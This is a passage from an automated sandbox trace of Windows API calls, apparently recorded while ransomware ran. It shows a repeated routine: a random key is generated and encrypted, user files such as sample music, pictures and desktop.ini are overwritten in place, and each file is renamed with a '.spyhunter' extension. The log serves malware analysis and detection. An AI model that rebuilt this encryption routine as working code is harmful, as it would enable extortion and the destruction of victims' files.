(in: hFile=0x178, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f30c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248f30c*=0x2800, lpOverlapped=0x0) returned 1 [0142.423] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0142.423] WriteFile (in: hFile=0x178, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248f30c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248f30c*=0x2800, lpOverlapped=0x0) returned 1 [0142.424] GetProcessHeap () returned 0x2c0000 [0142.424] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0142.424] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0142.424] WriteFile (in: hFile=0x178, lpBuffer=0x248f34c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f30c, lpOverlapped=0x0 | out: lpBuffer=0x248f34c*, lpNumberOfBytesWritten=0x248f30c*=0x4, lpOverlapped=0x0) returned 1 [0142.425] WriteFile (in: hFile=0x178, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f30c, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x248f30c*=0x30, lpOverlapped=0x0) returned 1 [0142.425] CloseHandle (hObject=0x178) returned 1 [0142.425] GetProcessHeap () returned 0x2c0000 [0142.425] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0142.425] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms.spyhunter") returned 123 [0142.425] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms" (normalized: "c:\\users\\default\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tmcontainer00000000000000000002.regtrans-ms"), lpNewFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms.spyhunter" (normalized: "c:\\users\\default\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tmcontainer00000000000000000002.regtrans-ms.spyhunter")) returned 1 [0142.426] GetProcessHeap () returned 0x2c0000 [0142.426] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0142.426] GetProcessHeap () returned 0x2c0000 [0142.426] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0142.426] GetProcessHeap () returned 0x2c0000 [0142.426] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5d250 | out: hHeap=0x2c0000) returned 1 [0142.426] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f348 | out: pbBuffer=0x248f348) returned 1 [0142.426] GetProcessHeap () returned 0x2c0000 [0142.426] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0142.426] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x248f340*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x248f340*=0x30) returned 1 [0142.427] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\.." (normalized: "c:\\users\\public"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0142.427] GetProcessHeap () returned 0x2c0000 [0142.427] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0142.427] GetProcessHeap () returned 0x2c0000 [0142.427] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f36a68 | out: hHeap=0x2c0000) returned 1 [0142.427] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f348 | out: pbBuffer=0x248f348) returned 1 [0142.427] GetProcessHeap () returned 0x2c0000 [0142.427] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0142.427] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x248f340*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x248f340*=0x30) returned 1 [0142.429] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\." (normalized: "c:\\users\\public\\pictures\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0142.434] GetProcessHeap () returned 0x2c0000 [0142.434] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0142.434] GetProcessHeap () returned 0x2c0000 [0142.435] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f369e0 | out: hHeap=0x2c0000) returned 1 [0142.438] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f338 | out: pbBuffer=0x248f338) returned 1 [0142.438] GetProcessHeap () returned 0x2c0000 [0142.438] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0142.438] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x248f330*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x248f330*=0x30) returned 1 [0142.439] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\Sleep Away.mp3" (normalized: "c:\\users\\public\\music\\sample music\\sleep away.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0142.439] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\Sleep Away.mp3") returned 53 [0142.439] StrStrW (lpFirst="Sleep Away.mp3", lpSrch=".txt") returned 0x0 [0142.439] GetProcessHeap () returned 0x2c0000 [0142.439] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0142.439] ReadFile (in: hFile=0x178, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f2f4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248f2f4*=0x2800, lpOverlapped=0x0) returned 1 [0142.459] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0142.459] WriteFile (in: hFile=0x178, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248f2f4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248f2f4*=0x2800, lpOverlapped=0x0) returned 1 [0142.459] GetProcessHeap () returned 0x2c0000 [0142.459] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0142.459] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0142.459] WriteFile (in: hFile=0x178, lpBuffer=0x248f334*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f2f4, lpOverlapped=0x0 | out: lpBuffer=0x248f334*, lpNumberOfBytesWritten=0x248f2f4*=0x4, lpOverlapped=0x0) returned 1 [0142.490] WriteFile (in: hFile=0x178, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f2f4, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x248f2f4*=0x30, lpOverlapped=0x0) returned 1 [0142.490] CloseHandle (hObject=0x178) returned 1 [0142.490] GetProcessHeap () returned 0x2c0000 [0142.490] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0142.490] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\Sleep Away.mp3.spyhunter") returned 63 [0142.490] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\Sleep Away.mp3" (normalized: "c:\\users\\public\\music\\sample music\\sleep away.mp3"), lpNewFileName="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\Sleep Away.mp3.spyhunter" (normalized: "c:\\users\\public\\music\\sample music\\sleep away.mp3.spyhunter")) returned 1 [0142.491] GetProcessHeap () returned 0x2c0000 [0142.491] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0142.491] GetProcessHeap () returned 0x2c0000 [0142.491] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0142.491] GetProcessHeap () returned 0x2c0000 [0142.491] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ffc308 | out: hHeap=0x2c0000) returned 1 [0142.663] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f330 | out: pbBuffer=0x248f330) returned 1 [0142.663] GetProcessHeap () returned 0x2c0000 [0142.663] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0142.663] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x248f328*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x248f328*=0x30) returned 1 [0142.663] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Recorded TV\\Sample Media\\desktop.ini" (normalized: "c:\\users\\public\\recorded tv\\sample media\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0142.664] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Recorded TV\\Sample Media\\desktop.ini") returned 56 [0142.664] StrStrW (lpFirst="desktop.ini", lpSrch=".txt") returned 0x0 [0142.664] GetProcessHeap () returned 0x2c0000 [0142.664] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0142.664] ReadFile (in: hFile=0x120, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f2ec, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248f2ec*=0xab, lpOverlapped=0x0) returned 1 [0142.665] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0xffffff55, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0142.665] WriteFile (in: hFile=0x120, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0xab, lpNumberOfBytesWritten=0x248f2ec, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248f2ec*=0xab, lpOverlapped=0x0) returned 1 [0142.665] GetProcessHeap () returned 0x2c0000 [0142.665] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0142.665] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0142.665] WriteFile (in: hFile=0x120, lpBuffer=0x248f32c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f2ec, lpOverlapped=0x0 | out: lpBuffer=0x248f32c*, lpNumberOfBytesWritten=0x248f2ec*=0x4, lpOverlapped=0x0) returned 1 [0142.665] WriteFile (in: hFile=0x120, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f2ec, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x248f2ec*=0x30, lpOverlapped=0x0) returned 1 [0142.665] CloseHandle (hObject=0x120) returned 1 [0142.665] GetProcessHeap () returned 0x2c0000 [0142.665] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0142.665] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Recorded TV\\Sample Media\\desktop.ini.spyhunter") returned 66 [0142.665] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Public\\Recorded TV\\Sample Media\\desktop.ini" (normalized: "c:\\users\\public\\recorded tv\\sample media\\desktop.ini"), lpNewFileName="\\\\?\\C:\\Users\\Public\\Recorded TV\\Sample Media\\desktop.ini.spyhunter" (normalized: "c:\\users\\public\\recorded tv\\sample media\\desktop.ini.spyhunter")) returned 1 [0142.668] GetProcessHeap () returned 0x2c0000 [0142.668] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0142.668] GetProcessHeap () returned 0x2c0000 [0142.668] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0142.668] GetProcessHeap () returned 0x2c0000 [0142.668] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ffea28 | out: hHeap=0x2c0000) returned 1 [0142.668] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f330 | out: pbBuffer=0x248f330) returned 1 [0142.668] GetProcessHeap () returned 0x2c0000 [0142.668] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0142.668] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x248f328*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x248f328*=0x30) returned 1 [0142.668] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Recorded TV\\Sample Media\\.." (normalized: "c:\\users\\public\\recorded tv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0142.668] GetProcessHeap () returned 0x2c0000 [0142.669] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0142.669] GetProcessHeap () returned 0x2c0000 [0142.669] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5ed70 | out: hHeap=0x2c0000) returned 1 [0142.669] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f328 | out: pbBuffer=0x248f328) returned 1 [0142.669] GetProcessHeap () returned 0x2c0000 [0142.669] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0142.669] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x248f320*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x248f320*=0x30) returned 1 [0142.669] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Recorded TV\\Sample Media\\." (normalized: "c:\\users\\public\\recorded tv\\sample media\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0142.669] GetProcessHeap () returned 0x2c0000 [0142.669] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0142.669] GetProcessHeap () returned 0x2c0000 [0142.669] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33eed8 | out: hHeap=0x2c0000) returned 1 [0142.669] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f328 | out: pbBuffer=0x248f328) returned 1 [0142.669] GetProcessHeap () returned 0x2c0000 [0142.669] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0142.669] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x248f320*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x248f320*=0x30) returned 1 [0142.669] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Recorded TV\\desktop.ini" (normalized: "c:\\users\\public\\recorded tv\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0142.670] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Recorded TV\\desktop.ini") returned 43 [0142.670] StrStrW (lpFirst="desktop.ini", lpSrch=".txt") returned 0x0 [0142.670] GetProcessHeap () returned 0x2c0000 [0142.670] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0142.670] ReadFile (in: hFile=0x120, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f2e4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248f2e4*=0x50, lpOverlapped=0x0) returned 1 [0142.671] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0xffffffb0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0142.671] WriteFile (in: hFile=0x120, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x248f2e4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248f2e4*=0x50, lpOverlapped=0x0) returned 1 [0142.671] GetProcessHeap () returned 0x2c0000 [0142.672] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0142.672] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0142.672] WriteFile (in: hFile=0x120, lpBuffer=0x248f324*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f2e4, lpOverlapped=0x0 | out: lpBuffer=0x248f324*, lpNumberOfBytesWritten=0x248f2e4*=0x4, lpOverlapped=0x0) returned 1 [0142.672] WriteFile (in: hFile=0x120, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f2e4, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x248f2e4*=0x30, lpOverlapped=0x0) returned 1 [0142.672] CloseHandle (hObject=0x120) returned 1 [0142.672] GetProcessHeap () returned 0x2c0000 [0142.672] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0142.672] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Recorded TV\\desktop.ini.spyhunter") returned 53 [0142.672] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Public\\Recorded TV\\desktop.ini" (normalized: "c:\\users\\public\\recorded tv\\desktop.ini"), lpNewFileName="\\\\?\\C:\\Users\\Public\\Recorded TV\\desktop.ini.spyhunter" (normalized: "c:\\users\\public\\recorded tv\\desktop.ini.spyhunter")) returned 1 [0142.688] GetProcessHeap () returned 0x2c0000 [0142.688] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0142.688] GetProcessHeap () returned 0x2c0000 [0142.688] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0142.688] GetProcessHeap () returned 0x2c0000 [0142.688] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2d0b1c8 | out: hHeap=0x2c0000) returned 1 [0142.688] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f320 | out: pbBuffer=0x248f320) returned 1 [0142.688] GetProcessHeap () returned 0x2c0000 [0142.688] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0142.688] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x248f318*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x248f318*=0x30) returned 1 [0142.688] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Recorded TV\\.." (normalized: "c:\\users\\public"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0142.688] GetProcessHeap () returned 0x2c0000 [0142.688] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0142.688] GetProcessHeap () returned 0x2c0000 [0142.688] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x30e898 | out: hHeap=0x2c0000) returned 1 [0142.688] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f320 | out: pbBuffer=0x248f320) returned 1 [0142.688] GetProcessHeap () returned 0x2c0000 [0142.689] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0142.689] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x248f318*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x248f318*=0x30) returned 1 [0142.689] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Recorded TV\\." (normalized: "c:\\users\\public\\recorded tv\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0142.689] GetProcessHeap () returned 0x2c0000 [0142.689] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0142.689] GetProcessHeap () returned 0x2c0000 [0142.689] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x30e808 | out: hHeap=0x2c0000) returned 1 [0142.692] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f310 | out: pbBuffer=0x248f310) returned 1 [0142.692] GetProcessHeap () returned 0x2c0000 [0142.692] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0142.692] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x248f308*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x248f308*=0x30) returned 1 [0142.692] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Tulips.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\tulips.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0142.692] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Tulips.jpg") returned 55 [0142.692] StrStrW (lpFirst="Tulips.jpg", lpSrch=".txt") returned 0x0 [0142.692] GetProcessHeap () returned 0x2c0000 [0142.692] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0142.692] ReadFile (in: hFile=0x120, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f2cc, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248f2cc*=0x2800, lpOverlapped=0x0) returned 1 [0142.966] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0142.967] WriteFile (in: hFile=0x120, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248f2cc, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248f2cc*=0x2800, lpOverlapped=0x0) returned 1 [0142.967] GetProcessHeap () returned 0x2c0000 [0142.967] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0142.967] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0142.967] WriteFile (in: hFile=0x120, lpBuffer=0x248f30c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f2cc, lpOverlapped=0x0 | out: lpBuffer=0x248f30c*, lpNumberOfBytesWritten=0x248f2cc*=0x4, lpOverlapped=0x0) returned 1 [0143.021] WriteFile (in: hFile=0x120, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f2cc, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x248f2cc*=0x30, lpOverlapped=0x0) returned 1 [0143.021] CloseHandle (hObject=0x120) returned 1 [0143.021] GetProcessHeap () returned 0x2c0000 [0143.021] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0143.021] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Tulips.jpg.spyhunter") returned 65 [0143.021] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Tulips.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\tulips.jpg"), lpNewFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Tulips.jpg.spyhunter" (normalized: "c:\\users\\public\\pictures\\sample pictures\\tulips.jpg.spyhunter")) returned 1 [0143.021] GetProcessHeap () returned 0x2c0000 [0143.021] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0143.021] GetProcessHeap () returned 0x2c0000 [0143.022] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0143.022] GetProcessHeap () returned 0x2c0000 [0143.022] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ffc6a0 | out: hHeap=0x2c0000) returned 1 [0143.022] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f310 | out: pbBuffer=0x248f310) returned 1 [0143.022] GetProcessHeap () returned 0x2c0000 [0143.022] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0143.022] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x248f308*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x248f308*=0x30) returned 1 [0143.022] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\.." (normalized: "c:\\users\\public\\pictures"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0143.022] GetProcessHeap () returned 0x2c0000 [0143.022] HeapFree (in: hHeap=0x2c0000, 